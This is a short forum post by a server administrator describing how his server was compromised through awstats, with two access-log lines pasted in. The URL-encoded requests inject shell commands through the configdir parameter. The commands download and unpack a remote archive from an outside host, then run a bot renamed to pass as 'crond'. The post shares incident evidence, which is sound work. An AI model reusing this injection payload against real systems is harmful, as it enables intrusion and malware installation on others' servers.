Hey guys,
I just though I would let you know how my server got compromised. This even happend after I installed the new version of awstats on Wednesday.
So in short I don't know if it is OK to run awstats as a cgi executable.
These are from my access log:
"GET /cgi-bin/awstats.pl? configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
"GET /cgi-bin/awstats.pl? configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidi lis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20 psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b% 2500 HTTP/1.1" 200 634 "-" "-"
-cs